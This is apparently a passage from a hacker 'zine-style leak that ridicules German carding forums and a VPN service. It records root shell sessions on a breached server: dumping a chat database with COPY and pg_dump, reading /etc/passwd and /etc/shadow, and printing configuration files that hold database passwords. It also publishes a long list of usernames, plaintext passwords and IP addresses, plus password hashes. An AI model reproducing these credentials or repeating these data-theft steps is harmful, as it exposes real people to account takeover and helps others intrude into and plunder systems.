jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1280970363' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> yaboybigt.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>73818444</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>yaboybigt</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T14:05:19'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281277327' xdbns='jabber:iq:last'/></xdb> # psql openfire openfire Password for user openfire: Welcome to psql 8.3.11, the PostgreSQL interactive terminal. openfire=# \l List of databases Name | Owner | Encoding -----------+----------+----------- openfire | openfire | UTF8 postgres | postgres | SQL_ASCII template0 | postgres | SQL_ASCII template1 | postgres | SQL_ASCII (4 rows) openfire=# \c openfire You are now connected to database "openfire". openfire=# \d List of relations Schema | Name | Type | Owner --------+----------------------+-------+---------- public | ofconparticipant | table | openfire public | ofconversation | table | openfire public | ofextcomponentconf | table | openfire public | ofgroup | table | openfire public | ofgroupprop | table | openfire public | ofgroupuser | table | openfire public | ofid | table | openfire public | ofmessagearchive | table | openfire public | ofmucaffiliation | table | openfire public | ofmucconversationlog | table | openfire public | ofmucmember | table | openfire public | ofmucroom | table | openfire public | ofmucroomprop | table | openfire public | ofmucservice | table | openfire public | ofmucserviceprop | table | openfire public | ofoffline | table | openfire public | ofpresence | table | openfire public | ofprivacylist | table | openfire public | ofprivate | table | openfire public | ofproperty | table | openfire public | ofpubsubaffiliation | table | openfire public | ofpubsubdefaultconf | table | openfire public | ofpubsubitem | table | openfire public | ofpubsubnode | table | openfire public | ofpubsubnodegroups | table | openfire public | ofpubsubnodejids | table | openfire public | ofpubsubsubscription | table | openfire public | ofremoteserverconf | table | openfire public | ofroster | table | openfire public | ofrostergroups | table | openfire public | ofrrds | table | openfire public | ofsaslauthorized | table | openfire public | ofsecurityauditlog | table | openfire public | ofuser | table | openfire public | ofuserflag | table | openfire public | ofuserprop | table | openfire public | ofvcard | table | openfire public | ofversion | table | openfire (38 rows) openfire=# COPY ofmessagearchive TO '/tmp/m_lawgs'; COPY 2190 openfire=# COPY ofuser TO '/tmp/u_lawgs'; COPY 313 openfire=# \q # pg_dump -U openfire openfire > /tmp/full_db Password: ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | fickmaus@jabber-swissfaking.net: | | na carders brauch diesesmal wohl länger wa? | | triple@jabber-swissfaking.net: | | Jo | | die haben immer noch ka | | wie die lücke ist | | ^^ | |____________________________________________________________________| Why don't you shut up and go administrate your own board, smarty-pants? Owait, Garcon! Make us a sandwich instead, you seem to know your stuff when it comes to ordering a la carte. ,;~;, _/\ \ ) (\\ ()) /';;,, // | -------=========={ Vpn24.org }========))))))))))))))=m( )_ __ | ,(.' '~/()' ' '\ ~ | ||( );, ( ,;.)-\ / ';, \ ( \ ( || \\ /_( /_( _____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | Liebe Carders.CC Member, | | | | Wir sind wieder da und haben euch Top Angebote mitgebracht :) | | | | Wir bieten euch 100% non-logging OpenVPN, Socks5 und SSH Socks | | Zugang auf unserem eigenen dedicated Server welcher in Russland | | steht, absolut unantastbar für Deutsche Behörden. Unser | | kompletter Service ist automatisiert, ihr könnt also schon in | | wenigen Minuten 100% anonym unterwegs sein. | | | | ... | | | VPN | Socks5 | | Secure Connection | Secure Connection | | Encryption AES-1024 | Encryption AES-512 | |_________________________________|__________________________________| They offer the carders.cc members 100% non-logging proxies on their own dedicated server which is located in Russia. They say that there is no way for German authorities to get access to it and that their service is fully automatic. The vpn connections are encrypted with AES-1024 and the socks5 proxies are encrypted with AES-512. And that sounds awesome! You even invented two new encryptions? Let's have a look at your webserver first, but, again, before we start, here is a list (user:plain password:ip:date) from your website: janitor1:nroknetsr3g:87.118.118.37:January 6, 2011, 8:33 pm jack123:heimatbrief:92.241.190.230:January 3, 2011, 3:54 pm shore:shoreshore:202.71.103.246:January 6, 2011, 6:28 pm hansi3000:w2z_RKDUU:212.117.177.110:January 5, 2011, 4:10 pm tarnung91:frauholle49:78.52.52.123:January 4, 2011, 11:54 am djdalio:123123:95.33.214.37:January 3, 2011, 5:03 pm selfcut:rittersport:88.76.106.196:January 3, 2011, 1:10 pm donkey:YX!"as78:84.183.121.124:January 3, 2011, 9:07 am obama123:derneger123:84.137.90.85:January 5, 2011, 5:43 pm neon1011:hassen11:91.43.254.141:January 3, 2011, 11:54 am f18black:pizza1:91.33.20.147:January 6, 2011, 2:37 pm hilli:ickeget6:85.17.161.84:January 6, 2011, 2:35 pm schmidi327:g5fkigd2:95.33.42.207:January 6, 2011, 11:39 pm 12dima12:jafCc8Nk:212.117.172.231:January 3, 2011, 9:03 pm blackmatrix:o75ev14J:87.185.157.32:January 7, 2011, 4:16 pm hanswurst:volkan:92.76.11.157:January 5, 2011, 10:41 pm ginal406:e*!ohWt7:92.241.190.253:January 3, 2011, 8:14 pm edgeee:azerty123:92.241.165.69:January 7, 2011, 1:00 am loowmanz:lowlowlow123:93.202.153.197:January 3, 2011, 7:51 am basha:kriminell:92.241.165.69:January 4, 2011, 9:42 pm zezol:4iP]XT4)om:79.170.124.248:January 3, 2011, 8:02 am duden:galaxy:92.241.190.253:January 6, 2011, 9:35 pm pill3:jackass123:212.117.172.231:January 5, 2011, 10:57 am darkt0wn:marvin88:217.72.222.183:January 5, 2011, 8:06 pm pyrodeath:b35ngf%:78.48.108.252:January 4, 2011, 12:55 pm conviction:ichbingeil:92.241.190.253:January 3, 2011, 5:12 pm blade1932:exaguqa5:92.241.190.253:January 3, 2011, 2:51 pm hackbart2:twd2005:92.241.190.253:January 3, 2011, 10:22 am juryrusski:jocklerhans:77.0.30.113:January 4, 2011, 8:47 pm h1xx3r:trustno1:84.23.74.92:January 4, 2011, 9:04 pm romulus89:192837465:80.123.42.135:January 3, 2011, 12:26 pm deluxe0160:tomtom:92.228.173.201:January 7, 2011, 10:08 pm hanshans123:hanshans:212.117.161.80:January 4, 2011, 12:43 am sanisan:19n4schk4tz385:84.184.246.137:January 6, 2011, 12:15 am pan1c:tigerpommes:92.241.190.253:January 5, 2011, 11:43 am revar:puppetteer:92.241.165.69:January 4, 2011, 1:45 pm epoepo:union84:92.241.190.253:January 4, 2011, 1:37 pm offlinejack:Jodelhe1n:88.76.253.194:January 6, 2011, 8:57 pm weedtwo:70301995:92.241.190.253:January 6, 2011, 5:18 pm pann0:pannopasch0:79.198.146.182:January 6, 2011, 6:02 pm eve1992:sacred:88.67.149.150:January 6, 2011, 10:03 am hi:suPPort_masterPass88:212.117.165.197:January 3, 2011, 2:27 am det0x:veronika:92.241.190.253:January 4, 2011, 3:19 pm malakas2:internet:212.117.172.231:January 3, 2011, 5:34 am fahne:23102007:78.50.87.217:January 4, 2011, 6:30 pm alanka:159369:85.25.165.138:January 3, 2011, 9:50 am pfanner:deinemudda:92.204.37.77:January 3, 2011, 12:53 pm delphinko:aLLanKoy0:87.118.118.37:January 3, 2011, 8:20 pm timetraveller:a3Pq71ryK1:79.229.42.88:January 7, 2011, 8:56 pm logg23:1q2w3e4r5t6z7u8i:212.117.172.231:January 6, 2011, 4:49 pm teppich:oog4weeT1acu:157.95.211.201:January 5, 2011, 12:49 am andreas7411:123456789a:88.65.104.195:January 3, 2011, 10:23 pm n3v10:uLeiDee7:212.117.172.231:January 4, 2011, 1:24 pm frezorx:123456:92.231.125.179:January 4, 2011, 3:11 am winkel72:berlin123:193.107.16.122:January 3, 2011, 9:34 pm trinx:meli1993:92.241.190.253:January 4, 2011, 3:38 pm c4sh1:mkz4kzj:80.121.99.73:January 7, 2011, 1:04 am tais46:spoiler:69.172.133.146:January 3, 2011, 1:36 pm whazun:daspw123:93.195.74.65:January 4, 2011, 11:44 am anubis:xy200xyx:79.213.81.205:January 5, 2011, 8:16 pm hugo21:901051901051:91.54.21.252:January 4, 2011, 12:14 pm doomlord:oxford:91.51.166.181:January 3, 2011, 6:53 pm sense88:pitbull:91.66.61.177:January 5, 2011, 7:11 am heavygun:vpn24private:91.6.0.76:January 6, 2011, 10:26 am tombi:Spiele:92.241.190.253:January 5, 2011, 1:08 pm messias91:qaywsx:92.241.165.69:January 6, 2011, 4:29 pm lryzx33:deutschlandhackedbysolme:91.121.82.175:January 4, 2011, 6:04 pm dre4m90:chillen:188.104.227.204:January 5, 2011, 10:56 am slumski:Harley23:109.193.150.182:January 3, 2011, 7:55 pm theultralooser:921234:92.241.190.81:January 4, 2011, 8:35 pm keystyle:firatfirat911:92.241.165.69:January 6, 2011, 7:33 pm hund123456:hund123456:46.114.42.253:January 4, 2011, 9:56 pm chiller1337:episodeone:92.241.190.253:January 5, 2011, 11:48 am turboprinz:886988:93.211.71.197:January 5, 2011, 9:25 pm silverfox:tamil94thenud*:93.218.92.119:January 4, 2011, 9:22 am ikas2:k7gh8uc3ph:77.11.24.196:January 7, 2011, 12:33 am mrmcfly:vpn2426112004:213.163.65.50:January 6, 2011, 4:53 pm weedtaxi:dura2131:93.222.176.113:January 4, 2011, 8:17 pm boxer1:daniel:188.193.12.78:January 5, 2011, 7:02 pm newb1:hans1234:92.241.165.69:January 6, 2011, 2:56 pm bichlord:michael12B:94.217.109.99:January 4, 2011, 5:52 pm neonaut:derotter:212.117.161.80:January 3, 2011, 11:45 am abs0lut:liberate012:92.241.165.69:January 3, 2011, 3:53 pm thalia:stachnik:81.210.157.177:January 4, 2011, 12:12 pm dudgeri:dude123:212.117.165.197:January 3, 2011, 10:56 am arider:amp483:77.189.15.2:January 4, 2011, 8:54 pm iodas1:hallo123:87.147.65.130:January 4, 2011, 8:42 pm hans2000:yxcvbnm22:84.59.141.5:January 6, 2011, 12:05 am jungeguter:toko29473:79.195.50.220:January 3, 2011, 4:40 pm th3sh4dow:han2jo4cu:88.69.160.243:January 7, 2011, 7:26 pm pwnny:faker123:77.176.234.57:January 4, 2011, 9:16 am papo00:papo0815:84.119.53.9:January 5, 2011, 8:24 pm thehen:duhurensohn:77.22.65.135:January 3, 2011, 11:21 pm random9999:dfds67621dd9999:199.48.147.41:January 3, 2011, 7:03 pm zorator:1q2w3e4r:91.121.72.221:January 3, 2011, 7:48 pm xr34ct0r:spelock1909:212.117.163.21:January 3, 2011, 7:56 pm deesr:timsilinsi:93.94.245.2:January 7, 2011, 6:19 pm juliasutter:01305806:91.89.165.7:January 3, 2011, 5:22 pm davidche:miezekatze:95.157.23.65:January 4, 2011, 10:37 pm k1xy0:1qayxcv:92.75.20.99:January 5, 2011, 2:20 am hyperion:sexysexy:212.117.172.231:January 3, 2011, 11:17 pm emrano:go,schosch:92.241.165.69:January 3, 2011, 1:58 pm razer111:hunter1:95.211.99.92:January 3, 2011, 11:30 am asus123:intelatom:82.195.232.218:January 7, 2011, 4:41 pm fruchtii:a1b2c3d4:87.118.118.37:January 3, 2011, 8:20 pm mcott:123456:92.241.165.69:January 3, 2011, 1:38 pm input:kingild:188.193.40.32:January 3, 2011, 6:15 pm snowghost:7LKCFwm:78.53.114.62:January 5, 2011, 12:05 pm fuckyou:fuckyou:212.117.177.110:January 6, 2011, 11:48 pm snowmann:passwort:84.133.162.225:January 6, 2011, 7:43 am nate23:hallo123:188.195.206.85:January 6, 2011, 4:10 am smilenike:nippellecken:92.241.190.253:January 6, 2011, 10:33 pm mastablasta:p4r4d153c1ty:62.141.39.222:January 3, 2011, 10:15 am beware:er.,fs:93.213.21.9:January 3, 2011, 6:45 pm 5liter:Walter50:87.118.118.37:January 3, 2011, 4:49 am d3struction:samson123:109.77.48.51:January 3, 2011, 4:48 pm traden90:1234abcder:92.241.190.253:January 3, 2011, 5:46 pm kaliber:kaliber44:79.218.97.68:January 6, 2011, 1:15 pm styles:736286:212.117.172.231:January 3, 2011, 2:53 pm thatslife:katze2:80.143.108.186:January 3, 2011, 11:49 pm n8zm5gg:kfkfgkfg1:199.48.147.40:January 6, 2011, 12:58 pm sparkasse:ficken:212.117.172.231:January 5, 2011, 2:17 am p1r0x:timtimtim12:88.153.214.11:January 5, 2011, 1:31 pm reideen:1kimmerle2:92.241.190.253:January 3, 2011, 10:03 am shadowgamer:lumega34:84.19.169.236:January 6, 2011, 10:32 pm kasanova:gentleman:92.241.190.253:January 4, 2011, 11:25 pm anonymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:06 pm thepu:asdf545:91.60.211.53:January 6, 2011, 4:26 pm ixam123:chichi12345:79.240.150.109:January 4, 2011, 10:31 am scanner1337:NL0AMGGG:93.221.58.122:January 3, 2011, 10:43 pm xelni:kir123:92.241.190.253:January 6, 2011, 8:06 pm nexus88:01230123:80.131.74.225:January 6, 2011, 2:10 am meball:MeBall456:92.241.168.90:January 4, 2011, 7:39 pm fuckdawn:former300:92.241.190.253:January 3, 2011, 12:06 pm kdkdkd:abcabc123:85.177.152.182:January 4, 2011, 7:34 pm nicvandebigdick:mezzomix:93.219.15.61:January 6, 2011, 3:52 am alfalfa:57596300:85.176.120.193:January 3, 2011, 3:53 pm kevin4ual:iloveu:92.241.190.253:January 4, 2011, 10:25 pm simonsemmler:gangbang:92.78.143.171:January 3, 2011, 10:29 am kuchen:asdasdasd:212.117.165.197:January 3, 2011, 2:21 am peters:Bobchen2:77.181.106.195:January 3, 2011, 6:41 pm anoymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:05 pm pitbull69:9g3qW$23r$SZg8§$2GD3rg83:87.122.14.183:January 5, 2011, 8:45 pm aschi2131:dura2131:93.222.176.113:January 4, 2011, 8:17 pm testuser0:hurensohn:93.94.245.129:January 7, 2011, 4:20 am makko:Lq=D)G92T2:79.228.238.216:January 3, 2011, 3:05 am slash:busenbusen:82.195.232.218:January 4, 2011, 12:50 pm thereplacer:fuckmyass:93.228.147.44:January 4, 2011, 6:48 pm xxx3xxx4:derneger:92.241.190.253:January 5, 2011, 12:51 am faxxer:hdgdla:90.134.58.200:January 5, 2011, 8:10 pm magi007:imcool123:80.121.47.36:January 3, 2011, 2:47 pm crack:novoline21:88.73.103.201:January 7, 2011, 12:55 am bekanntmachungen:BEKANNTMACHUNGEN:89.204.137.175:January 3, 2011, 3:32 pm ripit:gangbang123:212.117.172.231:January 4, 2011, 12:34 pm mttsmtts:IgjTu0800zSv:93.134.103.213:January 3, 2011, 2:08 pm dingdong:progamer:79.245.244.195:January 4, 2011, 12:13 pm sa1nt:krankheit:91.7.92.101:January 5, 2011, 3:12 am skilled:12345asdfg:94.23.114.4:January 4, 2011, 11:22 am juden:test123:95.208.15.191:January 6, 2011, 12:13 pm lolcat:i26nv1:79.204.36.137:January 3, 2011, 4:43 pm docstrange:.denis.1203.:78.34.37.56:January 3, 2011, 3:56 pm habadu:268413597:79.226.244.159:January 7, 2011, 12:05 am loldielol:server1:91.55.112.62:January 5, 2011, 6:07 pm kolumbus:infanterist2000:95.119.12.201:January 3, 2011, 8:31 pm freefall:88866654:87.174.242.241:January 5, 2011, 10:27 am lpboy:minkin:217.23.6.162:January 5, 2011, 8:10 pm freaky123:05151942662:77.187.60.32:January 6, 2011, 12:32 am kanye:Undertaker:92.241.165.69:January 5, 2011, 10:27 pm codered:3081994:84.62.202.48:January 5, 2011, 4:21 pm derboss:derboss:78.49.17.208:January 3, 2011, 8:52 pm mandy:hallo123456:91.58.51.156:January 4, 2011, 3:58 pm robmocdoc:881562:87.122.33.146:January 6, 2011, 3:07 pm mcknad:masterxx1994:92.194.116.34:January 5, 2011, 6:45 pm dre4m:gulliox90:188.104.236.248:January 4, 2011, 6:26 pm matzeyooo:heheyo12345:212.117.172.231:January 6, 2011, 3:03 am kerber0s:brennberg-1993:93.240.244.74:January 5, 2011, 5:43 pm lenox26:250384:95.211.99.91:January 3, 2011, 6:41 pm sidosido123:sidosido123:78.35.50.188:January 5, 2011, 1:53 am mrsocke:fckgwrhqq2:77.189.137.162:January 4, 2011, 5:45 pm schatten123:stinker:93.208.70.28:January 3, 2011, 6:56 pm ev0lein:scheisripper:87.118.120.182:January 3, 2011, 5:53 pm gweojk904trj:AOGWD55GMpUqCtB6Gsw2:92.241.190.253:January 4, 2011, 9:29 pm wolfgang:florian90:85.178.145.194:January 3, 2011, 1:33 pm cronic:67öänht53snjl:207.126.166.242:January 3, 2011, 10:04 pm w333d:w333d1:92.241.168.90:January 3, 2011, 11:18 am genetik10:s09101987:78.94.194.123:January 3, 2011, 2:19 pm elektro:elektrisch1:77.12.190.94:January 3, 2011, 5:51 pm amobios:welensitich9872582:89.149.242.16:January 3, 2011, 2:50 am mablutze:tobias12:91.112.18.154:January 4, 2011, 8:43 pm artist:yucatan1:82.198.80.81:January 4, 2011, 2:33 pm dukeraider:muschi:188.193.200.182:January 3, 2011, 10:06 am frankylo:Franky123456789*:95.211.13.145:January 3, 2011, 5:12 pm dusa123:123456789:79.246.188.21:January 5, 2011, 1:14 am asdfghjkl:carders231:84.161.40.27:January 5, 2011, 3:50 pm # uname -a Linux morphy 2.6.18-164.11.1.el5.028stab068.3 #1 SMP Wed Feb 17 15:22:30 MSK 2010 x86_64 GNU/Linux # id uid=0(root) gid=0(root) # cat /etc/issue Debian GNU/Linux 5.0 \n \l # cat /etc/passwd /etc/shadow root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:102:104:MySQL Server,,,:/var/lib/mysql:/bin/false Debian-exim:x:103:105::/var/spool/exim4:/bin/false proftpd:x:104:65534::/var/run/proftpd:/bin/false ftp:x:105:65534::/home/ftp:/bin/false hdf:x:1000:1000::/home/hdf:/bin/sh root:$1$SwmLmdGE$Unk7WkRpv7NF3O/0YSTCh/:14849:0:99999:7::: daemon:*:14237:0:99999:7::: bin:*:14237:0:99999:7::: sys:*:14237:0:99999:7::: sync:*:14237:0:99999:7::: games:*:14237:0:99999:7::: man:*:14237:0:99999:7::: lp:*:14237:0:99999:7::: mail:*:14237:0:99999:7::: news:*:14237:0:99999:7::: uucp:*:14237:0:99999:7::: proxy:*:14237:0:99999:7::: www-data:*:14237:0:99999:7::: backup:*:14237:0:99999:7::: list:*:14237:0:99999:7::: irc:*:14237:0:99999:7::: gnats:*:14237:0:99999:7::: nobody:*:14237:0:99999:7::: libuuid:!:14237:0:99999:7::: sshd:*:14237:0:99999:7::: mysql:!:14647:0:99999:7::: Debian-exim:!:14647:0:99999:7::: proftpd:!:14655:0:99999:7::: ftp:$1$0LKSrIAD$rt1vOaeYC8GrKvVzI.T6s.:14662:0:99999:7::: hdf:$1$RQkebH9N$LrPDCbeYn3.czmOpaM8nn.:14662:0:99999:7::: # cd / && ls -la total 168 drwxr-xr-x 21 root root 4096 Nov 18 23:11 . drwxr-xr-x 21 root root 4096 Nov 18 23:11 .. drwxr-xr-x 10 root root 4096 Feb 15 2010 SMF lrwxrwxrwx 1 root root 39 Nov 13 13:09 aquota.group -> /proc/vz/vzaquota/0000001e/aquota.group lrwxrwxrwx 1 root root 38 Nov 13 13:09 aquota.user -> /proc/vz/vzaquota/0000001e/aquota.user -rwxr-xr-x 1 root root 122 Aug 21 17:30 backup.sh drwxr-xr-x 2 root root 4096 May 13 2010 bin drwxr-xr-x 2 root root 4096 Dec 4 2008 boot drwxr-xr-x 4 root root 4096 Jan 7 06:25 dev drwxr-xr-x 57 root root 4096 Nov 13 13:09 etc drwxr-xr-x 4 root root 4096 Feb 15 2010 home drwxr-xr-x 10 root root 4096 Feb 15 2010 lib lrwxrwxrwx 1 root root 4 Mar 15 2010 lib64 -> /lib drwxr-xr-x 2 root root 4096 Dec 24 2008 media drwxr-xr-x 2 root root 4096 Dec 4 2008 mnt drwxr-xr-x 2 root root 4096 Dec 24 2008 opt dr-xr-xr-x 55 root root 0 Nov 13 13:09 proc drwx------ 6 root root 4096 Jan 7 22:18 root drwxr-xr-x 2 root root 4096 Feb 7 2010 sbin drwxr-xr-x 2 root root 4096 Sep 16 2008 selinux drwxr-xr-x 2 root root 4096 Dec 24 2008 srv drwxr-xr-x 3 root root 0 Nov 13 13:09 sys drwxrwxrwt 4 root root 4096 Jan 7 18:22 tmp drwxr-xr-x 11 root root 4096 Dec 24 2008 usr drwxr-xr-x 14 root root 4096 Mar 15 2010 var -rwxr-xr-x 1 root root 83749 Sep 8 17:15 xgoogler # cat backup.sh #!/bin/bash name=`date | sed -e "s/ /_/g"` name=`echo "/${name}__vpn24org_backup.tgz"` tar cfvz "$name" /root/ /var/www/ # cd /var/www && ls -la total 40 drwxr-xr-x 9 root root 4096 Dec 28 02:33 . drwxr-xr-x 14 root root 4096 Mar 15 2010 .. drwxr-xr-x 2 root root 4096 Nov 15 17:35 a drwxrwxrwx 3 root root 4096 Oct 13 23:26 dreckrebea12313 drwxrwxrwx 3 root root 4096 Apr 15 2010 dreckrebea12313123123131313131312313123 -rwxrwxrwx 1 root root 1 Sep 16 23:19 index.php drwxr-xr-x 16 root root 4096 Oct 17 22:20 sadas.org drwxrwxrwx 4 root root 4096 Oct 1 09:18 scenecms.org drwxr-xr-x 3 root root 4096 Dec 13 22:18 vpn24.org # cd dreckrebea12313 && ls -la total 20 drwxrwxrwx 3 root root 4096 Oct 13 23:26 . drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. -rw-r--r-- 1 root root 132 Oct 13 23:15 adsads.rar -rw-r--r-- 1 root root 35 Mar 15 2010 index.php drwxrwxrwx 3 root root 4096 Jan 7 22:20 web # cd web && ls -la total 40 drwxrwxrwx 3 root root 4096 Jan 7 22:20 . drwxrwxrwx 3 root root 4096 Oct 13 23:26 .. drwsrwsrwt 9 root root 4096 Apr 22 2010 board -rwsrwsrwt 1 root root 1033 Apr 19 2010 index.php #+s root? Holy crap! -rw-r--r-- 1 root root 0 Apr 22 2010 ipinfo.html -rw-r--r-- 1 root root 23564 Apr 19 2010 sc.png # cd board && ls -la total 228 drwsrwsrwt 9 root root 4096 Apr 22 2010 . drwxrwxrwx 3 root root 4096 Jan 7 22:20 .. drwxrwxrwx 3 root root 4096 Apr 22 2010 Packages -rw-r--r-- 1 root root 74243 Feb 14 2010 SSI.php -rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings.php -rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings_bak.php drwxrwxrwx 5 root root 4096 Apr 22 2010 Smileys drwxr-sr-x 2 root root 4096 Apr 22 2010 Sources drwxrwxrwx 8 root root 4096 Apr 22 2010 Themes -rwxrwxrwx 1 root root 3343 Jun 5 2005 agreement.txt drwxrwxrwx 2 root root 4096 Apr 24 2010 attachments drwxrwxrwx 4 root root 4096 Apr 22 2010 avatars drwxrwxrwx 2 root root 12288 Dec 28 02:20 cache -rw-r--r-- 1 root root 15347 Feb 14 2010 index.php -rw-r--r-- 1 root root 3975 Jan 6 2009 license.txt -rw-r--r-- 1 root root 2650 Feb 23 2010 news_readme.html -rw-r--r-- 1 root root 12350 Feb 23 2010 readme.html -rw-r--r-- 1 root root 30030 Feb 14 2010 ssi_examples.php -rw-r--r-- 1 root root 5909 Jan 1 2010 ssi_examples.shtml -rw-r--r-- 1 root root 10147 Feb 14 2010 subscriptions.php # cat Settings.php <?php /********************************************************************************** * Settings.php * *********************************************************************************** * SMF: Simple Machines Forum * * Open-Source Project Inspired by Zef Hemel (zef@zefhemel.com) * * =============================================================================== * * Software Version: SMF 2.0 RC3 * * Software by: Simple Machines (http://www.simplemachines.org) * * Copyright 2006-2010 by: Simple Machines LLC (http://www.simplemachines.org) * * 2001-2006 by: Lewis Media (http://www.lewismedia.com) * * Support, News, Updates at: http://www.simplemachines.org * *********************************************************************************** * This program is free software; you may redistribute it and/or modify it under * * the terms of the provided license as published by Simple Machines LLC. * * * * This program is distributed in the hope that it is and will be useful, but * * WITHOUT ANY WARRANTIES; without even any implied warranty of MERCHANTABILITY * * or FITNESS FOR A PARTICULAR PURPOSE. * * * * See the "license.txt" file for details of the Simple Machines license. * * The latest version can always be found at http://www.simplemachines.org. * **********************************************************************************/ ########## Maintenance ########## # Note: If $maintenance is set to 2, the forum will be unusable! Change it to 0 to fix it. $maintenance = 0; # Set to 1 to enable Maintenance Mode, 2 to make the forum untouchable. (you'll have to make it 0 again manually!) $mtitle = 'Maintenance Mode'; # Title for the Maintenance Mode message. $mmessage = 'Okay faithful users...we\'re attempting to restore an older backup of the database...news will be posted once we\'re back!'; # Description of why the forum is in maintenance mode. ########## Forum Info ########## $mbname = 'SceneCrypt'; # The name of your forum. $language = 'english'; # The default language file set for the forum. $boardurl = 'http://scenecrypt.org/board'; # URL to your forum's folder. (without the trailing /!) $webmaster_email = 'admin@admin.de'; # Email address to send emails from. (like noreply@yourdomain.com.) $cookiename = 'SMFCookie410'; # Name of the cookie to set for authentication. ########## Database Info ########## $db_type = 'mysql'; $db_server = 'localhost'; $db_name = 'smf13'; $db_user = 'root'; $db_passwd = 'QkZorIZZC5e'; $ssi_db_user = ''; $ssi_db_passwd = ''; $db_prefix = 'smf13_'; $db_persist = 0; $db_error_send = 1; ########## Directories/Files ########## # Note: These directories do not have to be changed unless you move things. $boarddir = '/var/www/scenecrypt.org/web/board'; # The absolute path to the forum's folder. (not just '.'!) $sourcedir = '/var/www/scenecrypt.org/web/board/Sources'; # Path to the Sources directory. $cachedir = '/var/www/scenecrypt.org/web/board/cache'; # Path to the cache directory. ########## Error-Catching ########## # Note: You shouldn't touch these settings. $db_last_error = 0; # Make sure the paths are correct... at least try to fix them. if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . '/agreement.txt')) $boarddir = dirname(__FILE__); if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources')) $sourcedir = $boarddir . '/Sources'; if (!file_exists($cachedir) && file_exists($boarddir . '/cache')) $cachedir = $boarddir . '/cache'; $db_character_set = 'utf8'; # cd /var/www/dreckrebea12313123123131313131312313123/ && ls -la total 16 drwxrwxrwx 3 root root 4096 Apr 15 2010 . drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. -rw-r--r-- 1 root root 35 Mar 15 2010 index.php drwxrwxrwx 4 root root 4096 Apr 15 2010 web # cd web && ls -la total 68 drwxrwxrwx 4 root root 4096 Apr 15 2010 . drwxrwxrwx 3 root root 4096 Apr 15 2010 .. -rwxrwxrwx 1 root root 983 Mar 15 2010 conf.php drwxrwxrwx 3 root root 4096 May 11 2010 images -rw-r--r-- 1 root root 42787 Apr 15 2010 index.php -rw-r--r-- 1 root root 1 Apr 15 2010 index__.php drwxrwxrwx 3 root root 4096 Mar 15 2010 psc # cat conf.php <?php define(_SceneCMS_footer, "SceneCMS v1.0"); define(_SceneCMS_admin, "mimimi"); define(_SceneCMS_Host, "localhost"); define(_SceneCMS_Username, "qstore"); define(_SceneCMS_Password, "4cFRwaLnt2qS2QSp"); define(_SceneCMS_Database, "qstore"); mysql_connect(_SceneCMS_Host,_SceneCMS_Username,_SceneCMS_Password); mysql_select_db(_SceneCMS_Database); function strFilter($text) { return (string)htmlentities($text); } function sql_str_escape($str) { if(get_magic_quotes_gpc()) stripslashes($str); return mysql_real_escape_string($str); } function Logout() { $_SESSION['cms_name'] = ""; $_SESSION['cms_validate'] = ""; session_destroy(); } function CheckLogin($killtrue) { if ($_SESSION['cms_name'] == "" or $_SESSION['cms_validate'] == "") { if($killtrue == 1 or $killtrue == "1") { echo ' <script> window.location.href = "?"; </script> '; die("No Access"); exit(); } return "0"; } else { return "1"; } } ?> # tar cvjf /tmp/psc.tar.bz2 psc/ psc/ psc/data/ psc/data/money-coin.png psc/data/Webbrowser.class.php psc/data/bg_code.jpg psc/data/bg.jpg psc/data/bg_lock.jpg psc/data/bg_captcha.jpg psc/index.html psc/api.php psc/cookie.txt # cd /var/www/sadas.org/ && ls -la total 5632 drwxr-xr-x 16 root root 4096 Oct 17 22:20 . drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. -rw-r--r-- 1 root root 19565 Apr 5 2010 LICENSE drwxr-xr-x 3 root root 4096 Apr 5 2010 admincp -rw-r--r-- 1 root root 23760 Apr 5 2010 ajax.php -rw-r--r-- 1 root root 75427 Apr 5 2010 album.php -rw-r--r-- 1 root root 17051 Apr 5 2010 announcement.php drwxr-xr-x 2 root root 4096 Apr 5 2010 archive -rw-r--r-- 1 root root 18225 Apr 5 2010 attachment.php 